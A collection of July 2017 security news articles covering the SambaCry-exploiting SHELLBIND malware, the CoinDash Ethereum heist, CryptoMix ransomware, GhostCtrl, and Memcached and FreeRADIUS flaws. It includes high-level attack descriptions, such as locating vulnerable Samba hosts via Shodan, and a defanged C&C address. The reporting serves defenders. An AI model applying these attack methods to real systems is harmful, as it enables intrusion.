"It is quite easy to find devices that use Samba in Shodan: searching for port 445 with a 'samba' string will turn up a viable IP list," researchers said while explaining the flaw.
"An attacker would then simply need to create a tool that can automatically write malicious files to every IP address on the list. Once they write the files into the public folders, the devices with the SambaCry vulnerability could become ELF_SHELLBIND.A victims."
However, it is not clear what the attackers do with the compromised devices and what's their actual motive behind compromising the devices.
The SambaCry vulnerability is hell easy to exploit and could be used by remote attackers to upload a shared library to a writable share and then cause the server to load and execute the malicious code.
The maintainers of Samba already patched the issue in Samba versions 4.6.4/4.5.10/4.4.14, so you are advised to patch your systems against the vulnerability as soon as possible.
Just make sure that your system is running updated Samba version.
Also, attackers need to have writable access to a shared location on the target system to deliver the payload, which is another mitigating factor that might lower the rate of infection.


IntelliAV: Toward the Feasibility of Building Intelligent Anti-Malware on Android Devices
19.7.2017 securityaffairs Android

IntelliAV is a practical intelligent anti-malware solution for Android devices based on the open-source and multi-platform TensorFlow library.
Android is targeted the most by malware coders as the number of Android users is increasing. Although there are many Android anti-malware solutions available in the market, almost all of them are based on malware signatures, and more advanced solutions based on machine learning techniques are not deemed to be practical for the limited computational resources of mobile devices.

There are many reasons for a user to have an intelligent security tool capable of identifying potential malware on the device.

1. The Google Play Store is not totally free of malware. Many zero-day mobile malware has been found in Google Play in the past.

2. Third-party app stores are popular among mobile users. Nevertheless, security checks on the third-party stores are not as effective as those available on the Google Play Store.

3. It is quite often that users can be dodged by fake tempting titles like free games when browsing the web, so that applications are downloaded and installed directly on devices from untrusted websites.

4. Another source of infection is phishing SMS messages that contain links to malicious applications. Recent reports by Lookout and Google show how a targeted attack malware, namely Pegasus(Chrysaor), which is suspected of infecting devices via a phishing attack, could remain undetected for a few years.

5. One of the main concerns for any computing device in the industry is to make sure that the device a user buys is free of malware. Mobile devices make no exception, and securing the supply chain is paramount difficult, for the number of people and companies involved in the supply chain of the components.
There is a recent report that shows how some malware was added to Android devices somewhere along the supply chain before the user received the phone.

6. Almost all of the Android anti-malware
products are mostly signature-based, which lets both malware variants of known families, and zero-day threats to devices. There are claims by a few Android anti-malware vendors that they use machine learning approaches, even if no detail is
available on the mechanisms that are actually implemented on the device.

7. Offline machine learning systems would fail against wrapper/downloder malware
as the wrapper/downloader app usually doesn’t reveal enough malicious activities.

IntelliAV (http://www.intelliav.com) is a practical intelligent anti-malware solution for Android devices based on the open-source and multi-platform TensorFlow library.
The detail of the system can be found in a paper that the authors will present at CD-MAKE 2017 conference in September at Reggio Calabria, Italy.

IntelliAV does not aim to propose yet another learning-based system for Android malware detection, but by leveraging on the existing literature, they tested the feasibility of having an on-device intelligent anti-malware tool to tackle the deficiencies of existing
Android anti-malware products, mainly based on pattern matching techniques.
The architecture of the proposed IntelliAV system is depicted as follows:
its design consists of two main phases, namely offline training the model, and then its operation on the device to detect potential malware samples.
As the first phase, a classification model is built offline, by resorting to a conventional
computing environment. It is not necessary to perform the training phase on the device because it has to be performed on a substantial set of samples whenever needed to take into account the evolution of malware. The number of times the model needs to be updated should be quite small, as reports by AV-TEST showed that just the 4% of the total number of Android malware is actually new malware.
As the second phase, the model is embedded in the IntelliAV Android application that will provide a risk score for each application on the device.

IntelliAV

IntelliAV can scan all of the installed applications on the device, and verify their risk scores (Quick Scan). In addition, when a user downloads an apk, it can be analyzed by IntelliAV before installation to check the related risk score, and take the appropriate decision (Custom Scan).

IntelliAV IntelliAV

Challenging Modern AV vendors

Based on the recent reports by Virustotal, there is an increase in the number of anti-malware developers that resort to machine learning approaches for malware detection. However, the main focus of these products appears to be on desktop malware, especially Windows PE malware. Based on the available public information, there are just a few pieces of evidence of two anti-malware developers that use machine learning approaches for Android malware detection, namely Symantec and TrustLook. Their products are installed by more than 10 million users. While it is not clear how these products use machine learning, the authors considered them as two candidates for
comparison with IntelliAV. To provide a sound comparison, in addition to the Symantec and Trustlook products, the authors selected three other Android anti-malware products, i.e., AVG, Avast, and Qihoo 360, that are the most popular among
Android users as they have been installed more than 100 million times. the authors
compared the performances of IntelliAV on 2311 recent Android malware
(between January to March 2017).

IntelliAV

As an independent test, IntelliAV has been tested by AV-TEST on 500 recent and common Android malware in July 2017.
Interesting, they could achieve 96% detection rate although the last model update of IntelliAV is December 2016, which shows the power of IntelliAV on detecting unknown malware.

IntelliAV

About the Author Mansour Ahmadi

IntelliAV has been developed at the University of Cagliari, Italy, by Mansour Ahmadi, Angelo Sotgiu, and Giorgio Giacinto. Mansour Ahmadi is a post-doctoral researcher at the PRA lab at the University of Cagliari, Italy. Angelo Sotgiu has a bachelor degree from the University of Cagliari. Prof. Giorgio Giacinto is an Associate Professor of Computer Engineering at the University of Cagliari.


Lithuania to extradite the man responsible for 100M email scam against Google and Facebook
19.7.2017 securityaffairs
Social

A Lithuanian court on Monday ruled the extradite of a man to the US to face charges of allegedly swindling $100M from Google and Facebook via email scam.
A Lithuanian man who is allegedly responsible for a $100 million scam (roughly 87 million euros) from tech companies Google and Facebook will be extradited to the United States soon.

The Lithuanian citizen Evaldas Rimasauskas (48) was arrested in March by local authorities. The US Law enforcement requested the arrest because the man stolen by the two IT giants the huge amount of money by posing as a large Asia-based hardware vendor.

The fraudulent activities happened between 2013 and 2015.

“The court has ruled in favor of extraditing Lithuanian citizen Evaldas Rimasauskas to the United States for criminal prosecution,” Judge Aiva Surviliene said.

Evaldas Rimasauskas email scam
Evaldas Rimasauskas is pictured in district court in Vilnius in May 2017 – Source AFP

The indictment explicitly mentioned Facebook and Google. According to the investigators, Rimasauskas created email accounts to trick victims into believing that the emails were sent by employees at the Asian hardware vendor.

He is accused of forging invoices, contracts, and letters to trick the administrative personnel into wiring over $100 million to overseas the bank accounts that he was managing.

The Rimasauskas’s lawyer, Snieguole Uzdaviniene, announced the intention of the man to appeal against the indictment.

Google confirmed that its systems were not hacked by the criminal, anyway, the company reviewed its internal processes and implemented countermeasures against email scams and BEC.

“We detected this fraud against our vendor management team and promptly alerted the authorities,” a Google spokesman told AFP.”We recouped the funds and we’re pleased this matter is resolved.”

Rimasauskas is waiting for the extradition and faces a maximum of 20 years in jail if convicted.


Two CryptoMix Ransomware variants emerged in a few days
19.7.2017 securityaffairs
Ransomware

Two CryptoMix Ransomware variants emerged in a few days, a circumstance that suggests the operators behind the threat are very active.
Malwarebytes’ researcher Marcelo Rivero has spotted a new variant of the CryptoMix ransomware.


Marcelo Rivero @MarceloRivero
#CryptoMix #Ransomware adds ext ".EXTE" to encrypted files, and the note "_HELP_INSTRUCTION.TXT" - md5: 1059676fbb9d811e88af96716cc1ffb5
12:07 AM - 14 Jul 2017
25 25 Retweets 18 18 likes
Twitter Ads info and privacy
The CryptoMix Malware family was spotted more than a year ago, numerous improvements were added across the time, except for the encryption method that remained the same.

Since the beginning of this year, researchers discovered at least three other CryptoMix variants in the wild, Wallet, CryptoShield, and Mole02.

The last variant observed by Rivero appends the ‘.EXTE’ extension to encrypted files.

Once the ransomware is launched on a computer, it drops a file in the ApplicationData folder and the ransom note in the targeted files’ folders. The ransomware creates a unique ID for each system and sends it to the C&C server.

Authors of the malware ask victims to pay the ransom in Bitcoins and use the email as a communication channel with the victims.

“While overall the encryption methods stay the same in this variant, there have been some differences. First and foremost, we have a new ransom note with a file name of _HELP_INSTRUCTION.TXT. ” wrote the researchers Lawrence Abrams from BleepingComputer.

“The next noticeable change is the extension appended to encrypted files. With this version, when a file is encrypted by the ransomware, it will modify the filename and then append the .EXTE extension to encrypted file’s name. For example, an test file encrypted by this variant has an encrypted file name of 32A1CD301F2322B032AA8C8625EC0768.EXTE.”

Lawrence also remarked that a different variant of the CryptoMix ransomware was observed appending the
. AZER extension to the encrypted files.

CryptoMix ransomware encrypted-files

Researchers observed that this variant was using a different ransom not ( _INTERESTING_INFORMACION_FOR_DECRYPT.TXT) and different email addressed to receive communications from the victims.

The AZER CryptoMix ransomware is the first malware of the family that works completely offline, its code included ten different RSA-1024 public encryption keys and uses one of them to encrypt the AES key it uses to encrypt the files.

“Last, but not least, this version performs no network communication and is completely offline. It also embeds ten different RSA-1024 public encryption keys, which are listed below. One of these keys will be selected to encrypt the AES key used to encrypt a victim’s files. This is quite different compared to the Mole02 variant, which only included one public RSA-1024 key.” states BleepingComputer.

The same feature was also implemented in the latest EXTE version, the experts observed it also embeds the ten public RSA keys allowing the threat working in absence of connection.

The discovery of two variants of the CryptoMix ransomware in the wild in a few days suggests the operators behind the threat are very active.


Hacker steals $7 Million in Ethereum from CoinDash in just 3 minutes
19.7.2017 securityaffairs Hacking

Hacker steals $7 Million in Ethereum from CoinDash in just 3 minutes after the ICO launch. Attacker tricked investors into sending ETH to the wrong address.
Cybercrime could be a profitable business, crooks stole $7 Million worth of Ethereum in just 3 minutes. The cyber heist was possible due to a ‘a simple trick.‘
Hackers have stolen the money from the Israeli social-trading platform CoinDash.
CoinDash hacked
CoinDash launched an Initial Coin Offering (ICO) to allow investors to pay with Ethereum and send funds to token sale’s smart contact address.
Hackers were able to divert over $7 million worth of Ethereum by replacing the legitimate wallet address used for the ICO with their own.

In three minutes after the ICO launch, the attacker tricked CoinDash’s investors into sending 43438.455 Ether to the wrong address owned by the attacker.

At the moment the hacker’s wallet has a balance of 43,488 Ethereum (around $8.1 million).

Let’s see the details of the attack?
CoinDash’s ICO published an Ethereum address on its website to allow investors to transfer the Ethereum funds.

After a few minutes of the launch, the company warned that its website had been hacked and confirmed that the ICO legitimate address was replaced by a fraudulent address.

The startup asked to stop sending Ethereum to the posted address.

“GUYS WEBSITE IS HACKED! Don’t send your ETH!!!” reads the message from CoinDash HQ.
“Wait for the announcement of the address”

Follow
CoinDash.io @coindashio
The Token Sale is done, do not send any ETH to any address. Official statement regarding the hack will be released soon.
4:39 PM - 17 Jul 2017
530 530 Retweets 341 341 likes
Twitter Ads info and privacy
Too late!
“The CoinDash Token Sale opened to the public on July 17 at 13:00PM GMT, starting with a 15 minute heads up for whitelist contributors. During these 15 minutes, 148 whitelisted contributors sent 39,000 ETH to the token sale smart contract that were secured with a multisig wallet.” reads the statement issued by the company.“The moment the token sale went public, the CoinDash website was hacked and a malicious address replaced the CoinDash Token Sale address. As a result, more than 2,000 investors sent ETH to the malicious address. The stolen ETH amounted to a total of 37,000 ETH.”
The company confirms it gathered around $6 million during the first three minutes of the ICO. It announced that it would issue tokens to the people who sent these funds to the correct wallet, but it also ensured that it will issue the tokens for the users that have been impacted by the hack and that sent the money to the hacker’s wallet.

“The CoinDash Token Sale secured $6.4 Million from our early contributors and whitelist participants and we are grateful for your support and contribution. CoinDash is responsible to all of its contributors and will send CDTs reflective of each contribution. Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly,” said the company.

However, CoinDash clarified that it would not compensate users who sent funds to the hacker’s address after the website was shut down by the company.

“CoinDash is responsible to all of its contributors and will send CDTs [CoinDash Tokens] reflective of each contribution,” the company noted.

“Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly.”

Follow
CoinDash.io @coindashio
If you sent ETH to the hacker address, please fill this form.https://docs.google.com/a/coindash.io/forms/d/13S2gbsO2eHcqk7MmAwLF9Ky1k4E7EUE9jnry79GR50U/edit?ts=596cfbdf …
8:16 PM - 17 Jul 2017
Photo published for CoinDash Token Sale Follow Up
CoinDash Token Sale Follow Up
Please help us to investigate the status and solve the issues from the token sale by providing following information. 请帮助我们持续调查并解决此次代币发售的现况与问题,在下方问卷中提供你参与发售的相关信息。
docs.google.com
483 483 Retweets 319 319 likes
Twitter Ads info and privacy
Some users speculate the cyber heist is an insider’s job … stay Tuned


SHELLBIND IoT malware targets NAS devices exploiting SambaCry flaw
19.7.2017 securityaffairs
Vulnerebility

The seven-year-old remote code execution vulnerability SambaCry was exploited by the SHELLBIND IoT malware to target NAS devices.
A new strain of malware dubbed SHELLBIND exploits the recently patched CVE-2017-7494 Samba vulnerability in attacks against Internet of Things devices.
SHELLBIND has infected most network-attached storage (NAS) appliances, it exploits the Samba vulnerability (also known as SambaCry and EternalRed) to upload a shared library to a writable share, and then cause the server to load that library.

This trick allows a remote attacker to execute arbitrary code on the targeted system.

CVE-2017-7494 is a seven-year-old remote code execution vulnerability that affects all versions of the Samba software since 3.5.0. The flaw has been patched by the development team of the project.
The CVE-2017-7494 flaw can be easily exploited, just a line of code could be used for the hack under specific conditions:

make file- and printer-sharing port 445 reachable on the Internet,
configure shared files to have write privileges.
use known or guessable server paths for those files
The Samba vulnerability affects the products of several major vendors, including NAS appliances.

The Samba bug appears to be a network wormable issue that could be exploited by a malicious code to self-replicate from vulnerable machine to vulnerable machine without requiring user interaction.
When SambaCry was discovered, nearly 485,000 Samba-enabled computers were found to be exposed on the Internet.

In June, researchers at Kaspersky Lab set up honeypots to detect SambaCry attacks in the wild. The experts spotted a malware campaign that was exploiting the SambaCry vulnerability to infect Linux systems and install a cryptocurrency miner.

“On May 30th our honeypots captured the first attack to make use of this particular vulnerability, but the payload in this exploit had nothing in common with the Trojan-Crypt that was EternalBlue and WannaCry. Surprisingly, it was a cryptocurrency mining utility!” reported Kaspersky.

The independent security researcher Omri Ben Bassat‏ also observed the same campaign that he dubbed “EternalMiner.” The expert confirmed threat actors started exploiting the SambaCry flaw just a week after its discovery to hijack Linux PCs and to install an upgraded version of “CPUminer,” a Monero miner.

In early July, experts at Trend Micro uncovered a new type of attack involving SambaCry. Crooks have been exploiting the flaw in attacks targeting NAS devices used by small and medium-size businesses. The malicious code was designed to compromise almost any IoT architecture, including MIPS, ARM, and PowerPC.
The attackers can easily find vulnerable devices using the Shodan Internet search engine then and write the malicious code to their public folders.

Experts at Trend Micro discovered that the ELF_SHELLBIND.A is delivered as a SO file to Samba public folders, then the attacker load and execute it by exploiting the SambaCry vulnerability.

“This more recent malware is detected as ELF_SHELLBIND.A and was found on July 3. Similar to the previous reports of SambaCry being used in the wild, it also opens a command shell on the target system. But ELF_SHELLBIND.A has marked differences that separate it from the earlier malware leveraging SambaCry. For one, it targets internet of things (IoT) devices—particularly the Network Attached Storage (NAS) devices favored by small to medium businesses.” reads the analysis published by Trend Micro. “ELF_SHELLBIND also targets different architectures, such as MIPS, ARM, and PowerPC. This is the first time we’ve seen SambaCry being exploited without the cryptocurrency miner as a payload.”

SHELLBIND-IoT-malware

Once the malware is executed, it connects a C&C server located in East Africa “169[.]239[.]128[.]123” over TCP, port 80. , To establish a connection, the malicious code modifies firewall rules, then the attacker will open a command shell on the target system.

“Once the connection is successfully established and authentication is confirmed, then the attacker will have an open command shell in the infected systems where he can issue any number of system commands and essentially take control of the device,” continues Trend Micro.

Sysadmins can protect their systems by updating their installs, if it is not possible for any reason a workaround can be implemented by the adding the line

nt pipe support = no
to the Samba configuration file and restarting the network’s SMB daemon.

The change will limit clients from accessing some network computers.


Organizations Slow to Patch Critical Memcached Flaws

18.7.2017 securityweek Vulnerebility

Tens of Thousands of Internet-Exposed Memcached Servers Are Vulnerable to Attacks

Tens of thousands of servers running Memcached are exposed to the Internet and affected by several critical vulnerabilities disclosed last year by Cisco’s Talos intelligence and research group.

In late October 2016, Talos published an advisory describing three serious flaws affecting Memcached, an open source, high performance distributed memory caching system used to speed up dynamic web apps by reducing the database load.

The vulnerabilities, tracked as CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706, allow a remote attacker to execute arbitrary code on vulnerable systems by sending specially crafted Memcached commands. The flaws can also be leveraged to obtain sensitive data that could allow an attacker to bypass exploit mitigations.

The security holes were patched by Memcached developers before Talos disclosed its findings. A few months later, in late February and early March 2017, researchers conducted Internet scans to find out how many organizations had patched their installations.

The scans uncovered a total of more than 107,000 servers accessible over the Internet and nearly 80 percent of them, or roughly 85,000 servers, were still vulnerable. Furthermore, only approximately 22 percent of the servers, or roughly 24,000, required authentication.

Nearly 30,000 of the vulnerable servers were located in the United States, followed by China (17,000), the United Kingdom (4,700), France (3,200), Germany (3,000), Japan (3,000), the Netherlands (2,600), India (2,500) and Russia (2,300).

After completing the scans, Cisco obtained contact email addresses for all the IP addresses associated with the vulnerable servers and attempted to notify affected organizations.

Six months later, researchers conducted another scan, but the situation improved only slightly, with roughly 10 percent of systems patched since the previous analysis. However, the number of servers requiring authentication dropped to 18,000, or 17 percent of the total.

Interestingly, researchers noticed that more than 28,000 of the previously discovered servers were no longer online. However, since the total number of Internet-facing installations remained the same, experts determined that some servers either changed their IPs or organizations had been deploying new systems with vulnerable versions of Memcached.

Talos warned that these vulnerable Memcached installations could be targeted in ransom attacks similar to the ones that hit MongoDB databases in early 2017. While Memcached is not a database, it can still contain sensitive information and disrupting it could have a negative impact on other dependent services.

“The severity of these types of vulnerabilities cannot be understated,” experts warned. “These vulnerabilities potentially affect a platform that is deployed across the internet by small and large enterprises alike. With the recent spate of worm attacks leveraging vulnerabilities this should be a red flag for administrators around the world. If left unaddressed the vulnerabilities could be leveraged to impact organizations globally and impact business severely.”

The number of Memcached instances accessible from the Internet has remained fairly constant over the past years. An analysis conducted in August 2015 uncovered 118,000 Memcached instances exposing 11 terabytes of data.


Code Execution, DoS Vulnerabilities Found in FreeRADIUS

18.7.2017 securityweek Vulnerebility

Security testing of FreeRADIUS using a technique known as fuzzing revealed more than a dozen issues, including vulnerabilities that can be exploited for denial-of-service (DoS) attacks and remote code execution.

Researcher Guido Vranken recently discovered several flaws in OpenVPN through fuzzing, a technique that involves automatically injecting malformed or semi-malformed data into software to find implementation bugs. One of the flaws also turned out to impact FreeRADIUS, an open source implementation of RADIUS (Remote Authentication Dial-In User Service), a networking protocol for user authentication, authorization and accounting.

After patching the vulnerability, the developers of FreeRADIUS, said to be the world’s most popular RADIUS server, asked Vranken to conduct fuzzing on their software.

Testing conducted by the researcher led to the discovery of 11 security issues and FreeRADIUS developers identified an additional four problems. Of the 15 weaknesses affecting versions 2 and/or 3 of the software, five cannot be exploited and six affect DHCP packet parsers. The security holes were addressed on Monday with the release of versions 2.2.10 and 3.0.15.

The list of vulnerabilities includes memory leak, out-of-bounds read, memory exhaustion, buffer overflow and other issues that can be exploited to remotely execute arbitrary code or cause a DoS condition. The flaws can be exploited by sending specially crafted packets to the targeted server.

The vulnerabilities that can be leveraged for remote code execution are CVE-2017-10984, which affects versions 3.0.0 through 3.0.14, and CVE-2017-10979, which affects versions 2.0.0 through 2.2.9. They can be exploited by sending packets with malformed WiMAX attributes.

“The short summary is that if your RADIUS server is on a private network, accessible only by managed devices, you are likely safe. If your RADIUS server is part of a roaming consortium, then anyone within that consortium can attack it. If your RADIUS server is on the public internet, then you are not following best practices, and anyone on the net can attack your systems,” FreeRADIUS maintainers explained.

They pointed out that writing secure code in C is a big challenge, which is why they have been using several static analysis tools to identify vulnerabilities. However, the fuzzing tests uncovered many flaws that were previously missed by these tools, which is why FreeRADIUS developers plan on integrating the fuzzer into all future releases of their software.


Two Iranians Charged in U.S. Over Hacking Defense Materials

18.7.2017 securityweek CyberSpy

Two Iranians were indicted Monday in the United States with hacking a defense contractor and stealing sensitive software used to design bullets and warheads, according to the Justice Department.

According to the newly unsealed indictment businessman Mohammed Saeed Ajily, 35, recruited Mohammed Reza Rezakhah, 39, to break into companies' computers to steal their software for resale to Iranian universities, the military and the government.

The two men -- and a third who was arrested in 2013 and handed back to Iran in a prisoner swap last year -- allegedly broke into the computers of Vermont-based Arrow Tech Associates.

The indictment said they stole in 2012 the company's Prodas ballistics software, which is used to design and test bullets, warheads and other military ordnance projectiles.

The material stolen from Arrow Tech was protected by US controls on the export of sensitive technologies, and its distribution to Iran was banned by US sanctions on the country.

The two men were charged in the Rutland, Vermont federal district court, which issued arrest warrants for the two, who are believed to be in Iran.

In 2013 the US secured the arrest in Turkey of a third Iranian in the case, Nima Golestaneh, 30, who was extradited to the United States.

In December 2015 he pleaded guilty to charges of wire fraud and computer hacking.

One month later he was freed as part of a prisoner exchange with Tehran, which returned four Americans in exchange for seven Iranians who had been arrested in separate schemes to obtain and smuggle to Iran sensitive US technologies.


Hacker Steals $7 Million in Ethereum From CoinDash

18.7.2017 securityweek Hacking

An actor managed to hack the CoinDash official website during the company's ICO (Initial Coin Offering) and diverted over $7 million worth of Ethereum by replacing the official wallet address with their own.

The incident took place on Monday, just minutes after the company launched its ICO in an attempt to raise funds in the form of Ethereum crypto-currency. Similar to an (IPO) Initial Public Offering, an ICO happens when a company is looking to gather funds and issue tokens in return.

According to CoinDash, the hacker managed to take over the official website only three minutes after the ICO started. They replaced the official Ethereum wallet address with their own, which resulted in people sending over $7 million to the fradulent address.

The company shut down the website immediately after discovering the hack and also posted warnings on their Twitter account, informing users of the issue. They also posted an official statement on the website, to provide additional details on the matter.

The company says it managed to gather around $6 million during the first three minutes of the ICO. It also announced that it would issue tokens not only to the people who sent these funds, but also to those who ended sending the money to the hacker’s wallet.

“The CoinDash Token Sale secured $6.4 Million from our early contributors and whitelist participants and we are grateful for your support and contribution. CoinDash is responsible to all of its contributors and will send CDTs reflective of each contribution. Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly,” the company says.

However, CoinDash said that it would not compensate users who sent funds to the fraudulent address after the website was shut down.

At the moment the hacker’s wallet shows a balance of 43,488 Ethereum, currently worth around $8.1 million. CoinDash suggested that around $7 million of these funds were sent in by its users, but the amount could be higher, as some users might have sent funds after the hack was discovered.

“During the attack $7 Million were stolen by a currently unknown perpetrator. […] We are still under attack. Please do not send any ETH to any address, as the Token Sale has been terminated,” the company notes on its website.

CoinDash says it is currently investigating the breach and will provide more details on it as soon as possible. The company also posted a form for those who sent money to the hacker to complete.

The incident is yet another reminder that “blockchain technology in isolation cannot assure additional security,” but in fact increases risks, High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek in an emailed comment.

“Many users, fooled by investors and so-called serial entrepreneurs, blindly believe that blockchain, particularly crypto-currencies, can make a digital revolution and provide an ‘unbreakable’ security. Unfortunately, this assumption is wrong and leads to a very dangerous feeling of false security. Blockchain technology can assure a very high level of data integrity, but we need to remember the numerous intertwined layers of modern technology stack, where one breached system or host can put the entire structure at risk,” Kolochenko said.

“Victims of this hack will quite unlikely get their money back as, technically speaking, it's virtually impossible. Moreover, law enforcement won't be able to help either in this case, except if it is an insider attack that can be investigated and prosecuted,” he concluded.


Android Backdoor GhostCtrl can spy on victims and take over Windows Systems
18.7.2017 securityaffairs Android

The GhostCtrl backdoor, is an OmniRAT-Based Android malware that can spy on victims, steal data and take over Windows System using the RETADUP infostealer.
Today’s smartphones are as powerful as the computers of only a few years ago. Unfortunately, that also means that Android phones have as many instances of malware as desktop and laptop computers. In 2016, Kaspersky Lab registered nearly 40 million attacks by malicious mobile software. Since smartphones are essentially full computers in your pocket, the bad guys are able to use many of the same techniques and in sometimes even the same tools! In late 2015 researchers at Avast discovered bad guys using the OmniRat remote administration tool (RAT) to compromise Android phones. On its own OmniRat is not malicious. It is a very capable tool for IT folks to provide remote support for Android users and even allows for remote access to Windows, Linux and Mac systems. It was also a very good tool for the bad guys to access your systems.

After several quiet months, OmniRat variants have been spotted in the wild and the software has benefitted from some significant updates since we last saw it. Dubbed GhostCtrl by Trend Micro researchers, it can do some “traditional” mobile malware things like:

Upload and download files to or from the bad guys’ servers
Send SMS messages to specified numbers (usually extra fee numbers)
Provide real time sensor data
As well as some very cool, and scary new things like:

Control the system infrared transmitter
Surreptitiously record voice, audio or video
Use the text-to-speech feature (i.e. translate text to voice/audio)
Clear/reset the password of an account specified by the attacker
Make the phone play different sound effects
Terminate an ongoing phone call
Use the Bluetooth to search for and connect to another device.
“The information-stealing RETADUP worm that affected Israeli hospitals is actually just part of an attack that turned out to be bigger than we first thought—at least in terms of impact. It was accompanied by an even more dangerous threat: an Android malware that can take over the device.” states the analysis from Trend Micro.

“Detected by Trend Micro as ANDROIDOS_GHOSTCTRL.OPS / ANDROIDOS_GHOSTCTRL.OPSA, we’ve named this Android backdoor GhostCtrl as it can stealthily control many of the infected device’s functionalities.”

This is scary enough — especially when you consider that there are a lot of bad guys out there that are only now starting to think of creative ways to exploit these new capabilities — GhostCtrl doesn’t limit itself to Android devices. Compromising a smartphone gives you access to a powerful computer, but most bad guys are after information. GhostCtrl comes with the RETADUP worm which was recently discovered stealing information from Windows systems in Israeli hospitals.

“GhostCtrl’s combination with an information-stealing worm, while potent, is also telling. The attackers tried to cover their bases, and made sure that they didn’t just infect endpoints. And with the ubiquity of mobile devices among corporate and everyday end users, GhostCtrl’s capabilities can indeed deliver the scares.” continues Trend Micro.

How Do You Get Infected?

GhostCtrl comes as an Android Application Package (APK) masquerading as a legitimate Android app such as WhatsApp, Pokemon Go, MMS — anything that will appeal to users. When the wrapper APK is launched, it decodes text from the resource file, writes this string as another APK and then launches this Malicious APK prompting the user to install it. It is easy to see how a user could be fooled or confused as to what file is asking to be installed and proceeding. Once the malicious software is installed the wrapper APK runs it as a service with no visible icon allowing the malware to run silently in the background.

ghostctrl android-backdoor

Once the malicious application is running in the background, it contacts Command and Control (C&C) servers on the Internet to determine its next actions as described above. Depending on the infected target and the motivations of the bad guys the GhostCtrl malware could be used for any number of malicious activities. If the infected phone is only used by an individual at home, ransomeware at the lock screen or pay-for-use SMS messaging is a good bet. However, since GhostCtrl has also been linked with RETADUP, bad guys could find themselves with an Android-based back channel into a Windows environment inside an enterprise, which offers many more opportunities for money making.

There have already been three versions of the GhostCtrl RAT identified in the wild, each adding features and capabilities to the previous version. You should expect that it will continue to be enhanced as it continues to be successful in making money for the authors. And while the Google Play store has hosted malware for brief periods of time, it is unlikely that an APK downloaded from the official Play Store will be GhostCtrl. If you are getting your APKs from anywhere else, you should brace for the worst.


Hacker Uses A Simple Trick to Steal $7 Million Worth of Ethereum Within 3 Minutes
18.7.2017 thehackernews  Hacking


All it took was just 3 minutes and 'a simple trick' for a hacker to steal more than $7 Million worth of Ethereum in a recent blow to the crypto currency market.
The heist happened after an Israeli blockchain technology startup project for the trading of Ether, called CoinDash, launched an Initial Coin Offering (ICO), allowing investors to pay with Ethereum and send funds to its address.
But within three minutes of the ICO launch, an unknown hacker stole more than $7 Million worth of Ether tokens by tricking CoinDash's investors into sending 43438.455 Ether to the wrong address owned by the attacker.
How the Hacker did this? CoinDash's ICO posted an Ethereum address for investors to pay with Ethereum and send funds to the app's website.
However, within a few minutes of the launch, CoinDash warned that its website had been hacked and the sending address was replaced by a fraudulent address, asking people not to send Ethereum to the posted address.
But before that, this little change of address redirected cryptocurrency by investors slated for CoinDash into the wallet of the hacker.
"It is unfortunate for us to announce that we have suffered a hacking attack during our Token Sale event," reads a statement posted on the company's official website.
"During the attack, $7 Million was stolen by a currently unknown perpetrator. The CoinDash Token Sale secured $6.4 Million from our early contributors and whitelist participants, and we are grateful for your support and contribution."
CoinDash doesn't know who is responsible for the attack, and the worst part is that the company is still under attack.
Investors are strongly advised to DO NOT send any Ether (ETH) to any address on the site, as CoinDash has terminated the Token Sale.
According to a CoinDash Slack channel screenshot posted to Reddit, CoinDash realised what was happening within 3 minutes, but it was too late.
Some people even believe that the incident was not a hack, rather an insider's job. One user said: "Is there any proof that this was a hack. What if Coindash put an address in and then cried hacker to get away with free ETH?"
The CoinDash website is offline, at the time of publication, and the company is asking affected investors who sent their Ether to the wrong address to collect the CoinDash token (CDT) by submitting information to this link.
However, investors sending Ether to any fraudulent address after the website was shut down will not be compensated.
"CoinDash is responsible to all of its contributors and will send CDTs [CoinDash Tokens] reflective of each contribution," the company noted.
"Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly."
This isn't the first time an ICO funding has been hacked. Last year, $50 Million was disappeared after hackers exploited code weaknesses in the Decentralised Anonymous Organisation (DAO) venture capital fund.


Lithuania to Extradite $100 Million Email Fraud Suspect to U.S.

18.7.2017 securityweek Hacking

A Lithuanian man who allegedly swindled $100 million (87 million euros) from tech giants Google and Facebook must be extradited to the United States, a court ruled on Monday.

"The court has ruled in favour of extraditing Lithuanian citizen Evaldas Rimasauskas to the United States for criminal prosecution," Judge Aiva Surviliene said.

The 48-year-old was arrested in March in the Baltic state at the request of US authorities, who accuse him of deceiving the two US firms in 2013-2015 by posing as a large Asia-based hardware vendor.

Facebook and Google are mentioned in the indictment, Rimasauskas's lawyer confirmed to AFP.

In a public statement, US prosecutors said Rimasauskas used "email accounts that were designed to create the false appearance that they were sent by employees and agents" of the Asian manufacturer.

He is also accused of forging invoices, contracts and letters to trick the companies into wiring over $100 million to overseas bank accounts under his control, according to prosecutors.

The scam was pulled off using deception and no Google systems were hacked, according to the California-based internet giant.

Google updated its internal processes to guard against similar incidents and recovered the money lost.

"We detected this fraud against our vendor management team and promptly alerted the authorities," a Google spokesman told AFP.

"We recouped the funds and we're pleased this matter is resolved."

Facebook did not respond to an AFP request for comment

Rimasauskas faces a maximum of 20 years in jail if convicted, the judge said.

Rimasauskas's lawyer, Snieguole Uzdaviniene, said she would appeal.


Google Inviting 2-Step Verification SMS Users to Google Prompt

18.7.2017 securityweek Safety

Google this week will start inviting 2-Step Verification (2-SV) SMS users to try Google Prompt, its year-old method of approving sign-in requests on smartphones.

Launched in June 2016, Google prompt allows users to approve sign-in requests via 2-SV by simply tapping “Yes” on a prompt. Available for both Android and iOS users, Google prompt received an improvement in February 2017, when Google added real-time security information about the login attempt, such as when and where it was made.

Google Prompt offers 2-SV over an encrypted connection and provides users with additional security features as well, including the option to block unauthorized access to their account.

While 2-SV users can also login by tapping a Security Key or by entering a verification code sent to their phone, in addition to using prompts, Google is now inviting those who receive a SMS on their phones to try Google prompts when they sign in.

“The invitation will give users a way to preview the new Google Prompts sign in flow instead of SMS, and, afterward, choose whether to keep it enabled or opt-out,” the Internet giant explains in a blog post.

